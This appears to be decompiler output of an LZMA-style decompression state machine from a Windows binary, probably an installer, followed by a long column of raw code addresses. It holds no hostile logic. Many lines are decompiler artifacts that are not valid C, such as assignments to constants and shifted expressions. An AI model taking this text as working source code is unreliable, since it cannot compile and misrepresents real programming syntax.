												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                            0x00000000
                                            0x00406bc4
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf6
                                            0x00406bfc
                                            0x00406c0e
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406bca
                                            0x00406bd0
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x004071ab
                                            0x004071b3
                                            0x004071ba
                                            0x004071bc
                                            0x004071c3
                                            0x004071c7
                                            0x004071c7
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407004
                                            0x00407007
                                            0x00407007
                                            0x0040700d
                                            0x0040700d
                                            0x004067a9
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x00000000
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x00406822
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406925
                                            0x00406927
                                            0x0040692a
                                            0x0040699b
                                            0x0040699e
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x0040692c
                                            0x00406930
                                            0x00406933
                                            0x00406935
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x0040694d
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406962
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406972
                                            0x00406975
                                            0x00406993
                                            0x00406995
                                            0x00000000
                                            0x00406977
                                            0x00406977
                                            0x0040697a
                                            0x0040697d
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x00000000
                                            0x0040698e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c55
                                            0x00406c58
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c34
                                            0x00406c37
                                            0x00406c3a
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406c4d
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00000000
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
